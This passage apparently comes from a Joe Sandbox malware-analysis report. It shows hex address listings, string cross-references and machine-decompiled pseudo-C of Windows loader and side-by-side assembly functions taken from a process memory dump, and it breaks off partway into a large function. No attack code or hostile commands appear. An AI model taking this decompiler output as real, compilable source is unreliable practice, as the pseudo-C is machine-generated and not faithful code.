                                                                                                                0x1e6b32dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b32e3
                                                                                                                0x1e6b32e9
                                                                                                                0x1e6b32eb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b32f1
                                                                                                                0x1e6b32f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b32f9
                                                                                                                0x1e6b32ff
                                                                                                                0x1e6b3301
                                                                                                                0x1e6b3307
                                                                                                                0x1e6b3303
                                                                                                                0x1e6b3303
                                                                                                                0x1e6b3303
                                                                                                                0x1e6b3326
                                                                                                                0x1e6b3328
                                                                                                                0x1e6b332e
                                                                                                                0x1e6b3330
                                                                                                                0x1e6b333c
                                                                                                                0x1e6b3342
                                                                                                                0x1e6b3348
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b334e
                                                                                                                0x00000000
                                                                                                                0x1e65b095
                                                                                                                0x1e65b095
                                                                                                                0x1e65b095
                                                                                                                0x1e65b09b
                                                                                                                0x1e65b09d
                                                                                                                0x1e65b134
                                                                                                                0x1e65b134
                                                                                                                0x1e65b136
                                                                                                                0x1e6b335f
                                                                                                                0x1e6b336b
                                                                                                                0x1e6b3370
                                                                                                                0x1e6b3372
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b3372
                                                                                                                0x1e65b13c
                                                                                                                0x1e65b13e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b144
                                                                                                                0x1e65b0a3
                                                                                                                0x1e65b0ab
                                                                                                                0x1e6b3383
                                                                                                                0x1e6b338a
                                                                                                                0x1e6b338d
                                                                                                                0x1e6b33a0
                                                                                                                0x1e6b33ab
                                                                                                                0x1e6b33c6
                                                                                                                0x1e6b33c8
                                                                                                                0x1e6b33ce
                                                                                                                0x1e6b33d0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b33dd
                                                                                                                0x1e6b33dd
                                                                                                                0x1e6b33df
                                                                                                                0x1e6b33e5
                                                                                                                0x1e6b33e5
                                                                                                                0x1e6b33eb
                                                                                                                0x1e6b33f2
                                                                                                                0x1e6b33f4
                                                                                                                0x1e6b3441
                                                                                                                0x1e6b3442
                                                                                                                0x1e6b3444
                                                                                                                0x1e6b344e
                                                                                                                0x00000000
                                                                                                                0x1e6b344e
                                                                                                                0x1e6b33f6
                                                                                                                0x1e6b33fc
                                                                                                                0x1e6b33fe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b3400
                                                                                                                0x1e6b340c
                                                                                                                0x1e6b3411
                                                                                                                0x1e6b3421
                                                                                                                0x1e6b342b
                                                                                                                0x1e6b342f
                                                                                                                0x1e6b3436
                                                                                                                0x00000000
                                                                                                                0x1e6b3436
                                                                                                                0x1e6b338f
                                                                                                                0x1e6b3391
                                                                                                                0x00000000
                                                                                                                0x1e6b3391
                                                                                                                0x00000000
                                                                                                                0x1e65b0ab
                                                                                                                0x1e65b08f
                                                                                                                0x1e65b0b9
                                                                                                                0x1e65b2e9
                                                                                                                0x1e65b2ef
                                                                                                                0x1e65b2fe
                                                                                                                0x1e65b30a
                                                                                                                0x1e65b30f
                                                                                                                0x1e65b30f
                                                                                                                0x1e65b2ef
                                                                                                                0x1e65b0c1
                                                                                                                0x1e65b149
                                                                                                                0x1e65b14b
                                                                                                                0x1e6b3488
                                                                                                                0x1e6b348f
                                                                                                                0x1e6b34c7
                                                                                                                0x1e6b34c7
                                                                                                                0x1e6b34cd
                                                                                                                0x1e6b34e0
                                                                                                                0x1e6b34e2
                                                                                                                0x1e6b34cf
                                                                                                                0x1e6b34cf
                                                                                                                0x1e6b34d5
                                                                                                                0x1e6b34d5
                                                                                                                0x00000000
                                                                                                                0x1e6b34cd
                                                                                                                0x1e6b3491
                                                                                                                0x1e6b3498
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b34a0
                                                                                                                0x1e6b34a5
                                                                                                                0x1e6b34ab
                                                                                                                0x1e6b34ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b34af
                                                                                                                0x1e6b34b5
                                                                                                                0x1e6b34bb
                                                                                                                0x1e6b34bb
                                                                                                                0x1e65b151
                                                                                                                0x1e65b151
                                                                                                                0x1e65b153
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b159
                                                                                                                0x1e65b15b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b0c1
                                                                                                                0x1e65af90
                                                                                                                0x1e65ae6a
                                                                                                                0x1e65ae6a
                                                                                                                0x1e65ae73
                                                                                                                0x1e6b3201
                                                                                                                0x1e65ae79
                                                                                                                0x1e65ae79
                                                                                                                0x1e65ae79
                                                                                                                0x1e65ae83
                                                                                                                0x1e6b3208
                                                                                                                0x00000000
                                                                                                                0x1e65ae89
                                                                                                                0x1e65ae89
                                                                                                                0x1e65ae8e
                                                                                                                0x1e65b31a
                                                                                                                0x1e65b31d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e65b323
                                                                                                                0x1e65b325
                                                                                                                0x1e65aea0
                                                                                                                0x1e65aea0
                                                                                                                0x1e65aea2
                                                                                                                0x1e65aea3
                                                                                                                0x1e65aea5
                                                                                                                0x1e65aeab
                                                                                                                0x1e65aeb1
                                                                                                                0x1e65aeb6
                                                                                                                0x1e65aebe
                                                                                                                0x1e65b1e7
                                                                                                                0x1e65b1f8
                                                                                                                0x1e65aed5
                                                                                                                0x1e65aed5
                                                                                                                0x00000000
                                                                                                                0x1e65aed5
                                                                                                                0x1e65aec9
                                                                                                                0x1e65b0c7
                                                                                                                0x1e65b0cd
                                                                                                                0x1e65b0d2
                                                                                                                0x1e6b34ed
                                                                                                                0x1e6b34f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b34ff
                                                                                                                0x1e65b0dd
                                                                                                                0x1e65b0e0
                                                                                                                0x1e6b3509
                                                                                                                0x1e6b350e
                                                                                                                0x1e6b3510
                                                                                                                0x1e6b3522
                                                                                                                0x1e6b3512
                                                                                                                0x1e6b351b
                                                                                                                0x1e6b351b
                                                                                                                0x1e6b3527
                                                                                                                0x1e6b3530
                                                                                                                0x1e6b3530
                                                                                                                0x1e65b0e6
                                                                                                                0x1e65b0ec
                                                                                                                0x1e65b0ef
                                                                                                                0x1e65b0f7
                                                                                                                0x1e65b0f8
                                                                                                                0x1e65b0f9
                                                                                                                0x1e65b107
                                                                                                                0x1e65b107
                                                                                                                0x1e65b0d8
                                                                                                                0x1e65b0d8
                                                                                                                0x00000000
                                                                                                                0x1e65b0d8
                                                                                                                0x1e65aecf
                                                                                                                0x00000000
                                                                                                                0x1e65aecf
                                                                                                                0x1e65b32b
                                                                                                                0x1e65ae94
                                                                                                                0x1e65ae96
                                                                                                                0x1e65ae98
                                                                                                                0x1e65ae9a
                                                                                                                0x1e65b18a
                                                                                                                0x1e65b18d
                                                                                                                0x1e6b3215
                                                                                                                0x1e6b3218
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b3223
                                                                                                                0x1e6b3226
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b322c
                                                                                                                0x1e65b193
                                                                                                                0x1e65b193
                                                                                                                0x00000000
                                                                                                                0x1e65b193
                                                                                                                0x00000000
                                                                                                                0x1e65ae9a
                                                                                                                0x1e65ae83
                                                                                                                0x1e65ae60
                                                                                                                0x1e65ae4b
                                                                                                                0x1e65ae4b
                                                                                                                0x00000000
                                                                                                                0x1e65ae4b
                                                                                                                0x1e65ae2d

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                • API String ID: 0-4098886588
                                                                                                                • Opcode ID: b7661b03c11eb9bc96094037f50c8a0dbd1875a334d914a108948fb4d2ac4651
                                                                                                                • Instruction ID: f975f40bf99ddee63b43629f48b2128f44374cca29efc3e5ee962fb6b3570136
                                                                                                                • Opcode Fuzzy Hash: b7661b03c11eb9bc96094037f50c8a0dbd1875a334d914a108948fb4d2ac4651
                                                                                                                • Instruction Fuzzy Hash: D8329F70F502A98BDB21CF15CC98B9EB7B6AF45380F9042EAE859A7350D7719E81CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E682C10 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 74%
                                                                                                                			E1E682C10(intOrPtr _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				char _v540;
				signed int _v544;
				char _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				signed int _v576;
				char _v580;
				char _v584;
				char* _v588;
				signed int _v590;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				intOrPtr _v604;
				signed int _v608;
				signed int _v612;
				signed short _v616;
				intOrPtr _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				intOrPtr _t79;
				signed int _t82;
				intOrPtr _t84;
				intOrPtr* _t104;
				void* _t105;
				void* _t106;
				signed int _t109;
				void* _t112;
				intOrPtr _t113;
				void* _t119;
				signed int _t123;
				signed int* _t126;
				void* _t127;
				signed int _t131;
				signed int _t133;

				_t133 = (_t131 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1e74b370 ^ _t133;
				_t104 = _a8;
				_t126 = _a12;
				_t76 = _a4 - 1;
				if(_t76 == 0) {
					_v580 = 0x18;
					_push( &_v580);
					_v568 = 0x40;
					_push(8);
					_v600 = 0;
					_push( &_v600);
					_v576 = 0;
					_v572 = 0x1e621338;
					_v564 = 0;
					_v560 = 0;
					_t79 = E1E692AB0();
					_v620 = _t79;
					if(_t79 >= 0 || _t79 == 0xc0000034 || _t79 == 0xc0000189) {
						_t80 = _v600;
						 *(_t104 + 0x18) =  *(_t104 + 0x18) | 0xffffffff;
						 *((intOrPtr*)(_t104 + 8)) = _v600;
					} else {
						_push(_t79);
						_t80 = E1E6DEF10(0x33, 0, "SXS: Unable to open registry key %wZ Status = 0x%08lx\n", 0x1e621338);
						 *((char*)(_t104 + 0x1c)) = 1;
						L36:
						_t133 = _t133 + 0x14;
						if(_t126 == 0) {
							L9:
							_pop(_t119);
							_pop(_t127);
							_pop(_t105);
							return E1E694B50(_t80, _t105, _v8 ^ _t133, _t115, _t119, _t127);
						}
						_t80 = _v608;
						L38:
						 *_t126 = _t80;
					}
					goto L9;
				}
				_t82 = _t76 - 1;
				if(_t82 != 0) {
					_t80 = _t82;
					if(_t80 == 0 &&  *_t104 != _t80) {
						_push( *_t104);
						_t80 = E1E692A80();
					}
					goto L9;
				}
				_t84 =  *((intOrPtr*)(_t104 + 4));
				if(_t84 != 0) {
					if(_t84 != 1) {
						_t109 =  *_t104;
						_t80 = _t84 + 0xfffffffe;
						_v608 = _t109;
						_v584 = 0;
						_v596 = _t80;
						if(_t109 == 0) {
							L33:
							 *((char*)(_t104 + 9)) = 1;
							goto L9;
						}
						_push( &_v584);
						_push(0x220);
						_t115 =  &_v556;
						_push( &_v556);
						_push(0);
						_push(_t80);
						_push(_t109);
						_t80 = E1E692CD0();
						_v624 = _t80;
						if(_t80 >= 0) {
							_t80 = _v544;
							if(_t80 > 0xfffe) {
								L20:
								 *((char*)(_t104 + 8)) = 1;
								if(_t126 != 0) {
									 *_t126 = 0xc0000106;
								}
								goto L9;
							}
							_t115 =  &_v592;
							_v592 = _t80;
							_v590 = _t80;
							_v588 =  &_v540;
							_t80 = E1E6DE222(_v608,  &_v592, _t104 + 0xc);
							_v612 = _t80;
							if(_t80 >= 0) {
								goto L9;
							}
							_push(_t80);
							_t80 = E1E6DEF10(0x33, 0, "SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx\n",  &_v592);
							 *((char*)(_t104 + 8)) = 1;
							goto L36;
						}
						if(_t80 == 0x8000001a) {
							goto L33;
						}
						_push(_t80);
						_t80 = E1E6DEF10(0x33, 0, "SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx\n", _v596);
						_t133 = _t133 + 0x14;
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 == 0) {
							goto L9;
						}
						_t80 = _v600;
						goto L38;
					}
					E1E695050(_t106,  &_v608, E1E6601C0());
					_t115 = _v616 & 0x0000ffff;
					 *(_t104 + 0xc) = 0;
					_t27 = _t115 + 0x10; // 0x50
					_t80 = _t27;
					if(_t27 > ( *(_t104 + 0xe) & 0x0000ffff)) {
						L22:
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 != 0) {
							 *_t126 = 0xc0000023;
						}
						goto L9;
					}
					E1E6988C0( *((intOrPtr*)(_t104 + 0x10)), _v604, _t115);
					_t133 = _t133 + 0xc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t80 = _v608 + 0x10;
					L8:
					 *(_t104 + 0xc) = _t80;
					goto L9;
				}
				_t80 =  *( *[fs:0x30] + 0x10);
				_t123 =  *( *( *[fs:0x30] + 0x10) + 0x38) & 0x0000ffff;
				_v596 = _t123;
				_t112 = _t123 + 0x10;
				if(_t112 > 0xfffe) {
					goto L20;
				}
				_t80 =  *(_t104 + 0xe) & 0x0000ffff;
				if(_t112 > ( *(_t104 + 0xe) & 0x0000ffff)) {
					goto L22;
				}
				_t113 =  *((intOrPtr*)( *( *[fs:0x30] + 0x10) + 0x3c));
				if(( *( *( *[fs:0x30] + 0x10) + 8) & 0x00000001) == 0) {
					_t113 = _t113 +  *( *[fs:0x30] + 0x10);
				}
				E1E6988C0( *((intOrPtr*)(_t104 + 0x10)), _t113, _t123);
				_t133 = _t133 + 0xc;
				_t115 = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t104 + 0xc) = _v596 + 0xe;
				if(E1E683194( *((intOrPtr*)(_t104 + 0x10)), 1) != 0) {
					goto L9;
				} else {
					_t80 = 0;
					goto L8;
				}
			}












































                                                                                                                0x1e682c18
                                                                                                                0x1e682c25
                                                                                                                0x1e682c30
                                                                                                                0x1e682c34
                                                                                                                0x1e682c38
                                                                                                                0x1e682c3b
                                                                                                                0x1e682d62
                                                                                                                0x1e682d6a
                                                                                                                0x1e682d6d
                                                                                                                0x1e682d75
                                                                                                                0x1e682d7b
                                                                                                                0x1e682d7f
                                                                                                                0x1e682d80
                                                                                                                0x1e682d84
                                                                                                                0x1e682d8c
                                                                                                                0x1e682d90
                                                                                                                0x1e682d94
                                                                                                                0x1e682d99
                                                                                                                0x1e682d9f
                                                                                                                0x1e682dac
                                                                                                                0x1e682db0
                                                                                                                0x1e682db4
                                                                                                                0x1e6c25a0
                                                                                                                0x1e6c25a0
                                                                                                                0x1e6c25ae
                                                                                                                0x1e6c25b3
                                                                                                                0x1e6c25b7
                                                                                                                0x1e6c25b7
                                                                                                                0x1e6c25bc
                                                                                                                0x1e682cd8
                                                                                                                0x1e682cdf
                                                                                                                0x1e682ce0
                                                                                                                0x1e682ce1
                                                                                                                0x1e682cec
                                                                                                                0x1e682cec
                                                                                                                0x1e6c25c2
                                                                                                                0x1e6c25c6
                                                                                                                0x1e6c25c6
                                                                                                                0x1e6c25c6
                                                                                                                0x00000000
                                                                                                                0x1e682d9f
                                                                                                                0x1e682c41
                                                                                                                0x1e682c44
                                                                                                                0x1e682cf0
                                                                                                                0x1e682cf3
                                                                                                                0x1e6c247e
                                                                                                                0x1e6c2480
                                                                                                                0x1e6c2480
                                                                                                                0x00000000
                                                                                                                0x1e682cf3
                                                                                                                0x1e682c4a
                                                                                                                0x1e682c4f
                                                                                                                0x1e682d01
                                                                                                                0x1e6c24c6
                                                                                                                0x1e6c24ca
                                                                                                                0x1e6c24cd
                                                                                                                0x1e6c24d1
                                                                                                                0x1e6c24d5
                                                                                                                0x1e6c24db
                                                                                                                0x1e6c258c
                                                                                                                0x1e6c258c
                                                                                                                0x00000000
                                                                                                                0x1e6c258c
                                                                                                                0x1e6c24e5
                                                                                                                0x1e6c24e6
                                                                                                                0x1e6c24eb
                                                                                                                0x1e6c24ef
                                                                                                                0x1e6c24f0
                                                                                                                0x1e6c24f1
                                                                                                                0x1e6c24f2
                                                                                                                0x1e6c24f3
                                                                                                                0x1e6c24f8
                                                                                                                0x1e6c24fe
                                                                                                                0x1e6c2535
                                                                                                                0x1e6c253e
                                                                                                                0x1e6c248a
                                                                                                                0x1e6c248a
                                                                                                                0x1e6c2490
                                                                                                                0x1e6c2496
                                                                                                                0x1e6c2496
                                                                                                                0x00000000
                                                                                                                0x1e6c2490
                                                                                                                0x1e6c2548
                                                                                                                0x1e6c254c
                                                                                                                0x1e6c2551
                                                                                                                0x1e6c255a
                                                                                                                0x1e6c2562
                                                                                                                0x1e6c2567
                                                                                                                0x1e6c256d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6c2573
                                                                                                                0x1e6c2581
                                                                                                                0x1e6c2586
                                                                                                                0x00000000
                                                                                                                0x1e6c2586
                                                                                                                0x1e6c2505
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6c250b
                                                                                                                0x1e6c2518
                                                                                                                0x1e6c251d
                                                                                                                0x1e6c2520
                                                                                                                0x1e6c2526
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6c252c
                                                                                                                0x00000000
                                                                                                                0x1e6c252c
                                                                                                                0x1e682d12
                                                                                                                0x1e682d17
                                                                                                                0x1e682d22
                                                                                                                0x1e682d26
                                                                                                                0x1e682d26
                                                                                                                0x1e682d2b
                                                                                                                0x1e6c24a1
                                                                                                                0x1e6c24a1
                                                                                                                0x1e6c24a7
                                                                                                                0x1e6c24ad
                                                                                                                0x1e6c24ad
                                                                                                                0x00000000
                                                                                                                0x1e6c24a7
                                                                                                                0x1e682d39
                                                                                                                0x1e682d4b
                                                                                                                0x1e682d4e
                                                                                                                0x1e682d4f
                                                                                                                0x1e682d50
                                                                                                                0x1e682d51
                                                                                                                0x1e682d56
                                                                                                                0x1e682cd4
                                                                                                                0x1e682cd4
                                                                                                                0x00000000
                                                                                                                0x1e682cd4
                                                                                                                0x1e682c5b
                                                                                                                0x1e682c5e
                                                                                                                0x1e682c62
                                                                                                                0x1e682c66
                                                                                                                0x1e682c6f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e682c75
                                                                                                                0x1e682c7b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e682c8a
                                                                                                                0x1e682c9a
                                                                                                                0x1e6c24be
                                                                                                                0x1e6c24be
                                                                                                                0x1e682ca6
                                                                                                                0x1e682cb6
                                                                                                                0x1e682cbc
                                                                                                                0x1e682cbe
                                                                                                                0x1e682cbf
                                                                                                                0x1e682cc0
                                                                                                                0x1e682cc1
                                                                                                                0x1e682cc5
                                                                                                                0x1e682cd0
                                                                                                                0x00000000
                                                                                                                0x1e682cd2
                                                                                                                0x1e682cd2
                                                                                                                0x00000000
                                                                                                                0x1e682cd2

                                                                                                                Strings
                                                                                                                • @, xrefs: 1E682D6D
                                                                                                                • \WinSxS\, xrefs: 1E682D43
                                                                                                                • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 1E6C2510
                                                                                                                • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 1E6C25A6
                                                                                                                • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 1E6C2579
                                                                                                                • .Local\, xrefs: 1E682CB1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                                • API String ID: 0-3926108909
                                                                                                                • Opcode ID: eba60f7bc08a23b6226a7f0fffb0f81153665a2883bb54f5b1def7e7b60efddc
                                                                                                                • Instruction ID: 5622f6867c48a13253e32c2a0849f52ab8dc5b309a7ed1265136df7b95b82f77
                                                                                                                • Opcode Fuzzy Hash: eba60f7bc08a23b6226a7f0fffb0f81153665a2883bb54f5b1def7e7b60efddc
                                                                                                                • Instruction Fuzzy Hash: 5D81BB715093829FD711CF16C890A6BB7E9FF86B10F808B5AFC899B255D370D944CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E666FE0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1E666FE0(signed char __ecx, signed int __edx, signed int _a4, unsigned int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed short _v48;
				char _v49;
				signed int _v56;
				char _v57;
				char _v58;
				signed char _v59;
				char _v60;
				char _v61;
				signed int _v68;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed short _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				signed short _v110;
				char _v111;
				signed int _v116;
				signed int _v120;
				signed char _v124;
				signed int _v128;
				signed short _v130;
				signed short _v132;
				signed short _v134;
				signed short _v136;
				signed int _v140;
				signed short _v144;
				signed short _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				short* _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed short _v196;
				unsigned int* _v200;
				intOrPtr _v204;
				signed int _v208;
				signed short _v212;
				signed int _v216;
				signed int _v220;
				signed char _v224;
				unsigned int* _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				char _v256;
				intOrPtr _v260;
				signed int* _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed short _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed short _v340;
				signed short _v348;
				signed int _v356;
				signed short _v364;
				signed short _v372;
				signed short _v380;
				signed short _v388;
				signed short _v396;
				signed short _v404;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t980;
				signed int _t985;
				char* _t988;
				signed int _t994;
				signed int _t998;
				signed int _t1004;
				signed char* _t1005;
				signed int _t1006;
				signed char* _t1007;
				signed int _t1008;
				signed char* _t1009;
				signed int _t1011;
				intOrPtr _t1012;
				signed int _t1026;
				signed char* _t1027;
				intOrPtr _t1036;
				signed int _t1037;
				signed char* _t1038;
				intOrPtr _t1047;
				signed int _t1052;
				signed int _t1053;
				intOrPtr _t1055;
				signed short* _t1056;
				signed int* _t1059;
				unsigned int* _t1066;
				signed int _t1069;
				signed int _t1071;
				signed int _t1073;
				signed short _t1075;
				void* _t1076;
				signed short _t1079;
				signed int _t1081;
				signed short _t1083;
				signed int* _t1085;
				signed char* _t1088;
				signed int _t1090;
				signed int _t1101;
				intOrPtr* _t1102;
				signed int _t1104;
				signed int _t1108;
				signed int _t1118;
				unsigned int _t1125;
				signed int _t1134;
				signed char _t1135;
				signed short _t1143;
				signed char _t1147;
				signed short _t1148;
				void* _t1149;
				signed short _t1154;
				signed int _t1157;
				intOrPtr* _t1163;
				intOrPtr* _t1164;
				signed int _t1171;
				signed int _t1172;
				intOrPtr* _t1180;
				intOrPtr* _t1181;
				signed int _t1184;
				signed int _t1189;
				signed short _t1191;
				intOrPtr _t1197;
				signed int _t1202;
				signed int _t1205;
				signed int _t1208;
				intOrPtr* _t1216;
				signed int _t1219;
				signed int* _t1226;
				signed int* _t1227;
				signed int _t1230;
				signed int _t1231;
				signed int _t1237;
				signed short* _t1241;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed short* _t1253;
				signed short* _t1257;
				signed int _t1263;
				signed int _t1265;
				signed short _t1266;
				signed int _t1269;
				signed int _t1271;
				signed int _t1274;
				signed short _t1302;
				signed short _t1306;
				intOrPtr _t1312;
				signed int _t1316;
				signed int _t1321;
				signed int _t1327;
				signed int _t1328;
				signed int _t1332;
				signed short* _t1334;
				signed short _t1336;
				signed int* _t1337;
				signed int _t1349;
				signed int _t1356;
				signed short _t1378;
				void* _t1379;
				signed short _t1384;
				signed int _t1385;
				signed int _t1389;
				intOrPtr* _t1391;
				signed short _t1393;
				signed int* _t1394;
				signed int _t1406;
				signed int _t1413;
				intOrPtr* _t1417;
				signed char _t1419;
				signed int _t1421;
				signed int _t1423;
				char _t1429;
				void* _t1436;
				signed int _t1440;
				signed int _t1441;
				signed short _t1443;
				signed int _t1444;
				unsigned int _t1447;
				signed int _t1449;
				signed short _t1450;
				signed int _t1452;
				signed short _t1454;
				signed short _t1455;
				signed char _t1464;
				signed int _t1469;
				unsigned int _t1472;
				intOrPtr* _t1473;
				signed int _t1482;
				signed int _t1484;
				signed int _t1486;
				signed int _t1487;
				signed short _t1495;
				intOrPtr _t1496;
				signed short _t1498;
				signed char _t1499;
				signed int _t1500;
				signed short* _t1501;
				signed int _t1502;
				signed short* _t1505;
				signed char* _t1510;
				signed char _t1513;
				intOrPtr _t1517;
				signed int* _t1518;
				signed char _t1519;
				signed int _t1520;
				signed short _t1521;
				intOrPtr _t1522;
				signed short _t1524;
				signed int _t1526;
				intOrPtr* _t1528;
				signed int _t1530;
				intOrPtr* _t1533;
				signed char _t1536;
				intOrPtr _t1537;
				intOrPtr _t1542;
				signed char _t1548;
				intOrPtr* _t1550;
				signed int _t1553;
				signed int _t1555;
				intOrPtr _t1564;
				intOrPtr _t1565;
				signed int _t1567;
				signed int _t1569;
				signed int _t1570;
				unsigned int _t1573;
				signed int _t1576;
				signed int _t1578;
				intOrPtr _t1599;
				signed int _t1605;
				signed short _t1608;
				void* _t1609;
				signed int _t1611;
				signed short _t1612;
				signed short _t1635;
				intOrPtr _t1636;
				signed short _t1638;
				signed short _t1641;
				signed int _t1643;
				signed int _t1646;
				signed int _t1653;
				unsigned int _t1661;
				signed int _t1662;
				intOrPtr _t1667;
				signed int _t1670;
				signed int _t1672;
				signed int _t1674;
				signed int _t1677;
				signed short _t1679;
				signed int _t1680;
				signed short* _t1688;
				signed int _t1690;
				signed short _t1691;
				intOrPtr _t1693;
				signed int _t1695;
				signed short _t1696;
				intOrPtr _t1698;
				signed short _t1700;
				unsigned int _t1705;
				signed int _t1708;
				intOrPtr _t1709;
				signed short _t1711;
				signed int _t1712;
				signed int _t1714;
				signed int _t1715;
				signed short _t1719;
				signed int _t1721;
				signed short _t1723;
				signed short _t1724;
				signed short _t1725;
				signed int _t1727;
				signed int _t1729;
				signed short _t1730;
				signed int _t1738;
				intOrPtr _t1739;
				signed short _t1743;
				unsigned int _t1745;
				signed int _t1757;
				signed char _t1767;
				signed int _t1768;
				signed char _t1771;
				signed int _t1774;
				signed short _t1775;
				signed int _t1777;
				signed short _t1778;
				signed int _t1784;
				unsigned int _t1789;
				signed int _t1790;
				signed int _t1791;
				intOrPtr* _t1792;
				signed int _t1793;
				signed int* _t1794;
				signed short* _t1795;
				signed int _t1796;
				signed short* _t1797;
				signed int* _t1798;
				short* _t1799;
				intOrPtr _t1800;
				signed int _t1801;
				signed short* _t1802;
				intOrPtr _t1803;
				signed int _t1804;
				intOrPtr* _t1805;
				intOrPtr* _t1806;
				signed int _t1807;
				signed int _t1808;
				void* _t1809;
				intOrPtr _t1810;
				signed int _t1812;
				unsigned int _t1814;
				unsigned int* _t1816;
				signed int _t1817;
				signed int _t1818;
				signed int _t1819;
				signed int _t1820;
				signed int* _t1821;
				signed int _t1822;
				signed int _t1825;
				signed int _t1826;
				intOrPtr _t1827;
				signed int _t1828;
				signed int* _t1829;
				signed int _t1830;
				signed int* _t1833;
				intOrPtr _t1834;
				signed int _t1837;
				void* _t1838;
				void* _t1839;
				void* _t1842;
				void* _t1843;
				void* _t1853;

				_t1658 = __edx;
				_t1460 = __ecx;
				_push(0xfffffffe);
				_push(0x1e72c1c8);
				_push(E1E69AD20);
				_push( *[fs:0x0]);
				_t1839 = _t1838 - 0x180;
				_t980 =  *0x1e74b370;
